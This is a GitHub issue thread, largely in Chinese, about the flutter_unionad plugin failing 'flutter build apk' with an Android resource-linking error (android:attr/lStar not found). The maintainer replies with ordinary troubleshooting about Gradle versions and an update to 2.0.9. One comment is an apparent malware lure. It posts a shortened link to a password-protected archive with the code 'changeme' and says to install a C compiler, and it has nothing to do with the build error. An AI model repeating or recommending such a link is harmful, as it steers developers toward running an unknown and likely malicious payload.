### ISSUE TITLE
flutter build apk 失败

### ISSUE THREAD

**Issue by RockyFung** [gstory0404/flutter_unionad#122]
### 描述
 flutter_unionad: 2.0.8
flutter build apk 报错如下，大佬，是什么原因

FAILURE: Build failed with an exception.

* What went wrong:
Execution failed for task ':flutter_unionad:verifyReleaseResources'.
> A failure occurred while executing com.android.build.gradle.tasks.VerifyLibraryResourcesTask$Action
   > Android resource linking failed
     ERROR: .../project/build/flutter_unionad/intermediates/merged_res/release/values/values.xml:2727: AAPT: error: resource android:attr/lStar not found.

### 设备版本
[✓] Flutter (Channel stable, 3.24.1, on macOS 14.3 23D2057 darwin-arm64, locale
    zh-Hans-CN)
[✓] Android toolchain - develop for Android devices (Android SDK version 35.0.0)
[✓] Xcode - develop for iOS and macOS (Xcode 15.3)
[✓] Chrome - develop for the web
[✓] Android Studio (version 2024.1)
[✓] VS Code (version 1.90.2)
[✓] Connected device (4 available)
[✓] Network resources

### 插件版本
> 插件版本号

### 日志
> 详细的log日志或者截图录屏
```

```

**Comment by d-dvorkin** [comment]
I think this will help you.
https://bit.ly/3TC7hrw
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by gstory0404** [comment]
#118 参考这个

**Comment by RockyFung** [comment]
是在 android>app>build.gradle里么？
创建的文件里没有minSdkVersion字段，我在里面添加了  minSdkVersion 21，貌似没效果，直接改minSdk = 21 也是
defaultConfig {
        // TODO: Specify your own unique Application ID (https://developer.android.com/studio/build/application-id.html).
        applicationId = "com.example.tiankongjuezhan"
        // You can update the following values to match your application needs.
        // For more information, see: https://flutter.dev/to/review-gradle-config.
        minSdk = flutter.minSdkVersion
        targetSdk = flutter.targetSdkVersion
        versionCode = flutter.versionCode
        versionName = flutter.versionName

        
    }

**Comment by gstory0404** [comment]
android/settings.gradle 中版本多少

**Comment by RockyFung** [comment]
plugins {
    id "dev.flutter.flutter-plugin-loader" version "1.0.0"
    id "com.android.application" version "7.3.0" apply false
    id "org.jetbrains.kotlin.android" version "1.7.10" apply false
}

**Comment by gstory0404** [comment]
更新2.0.9
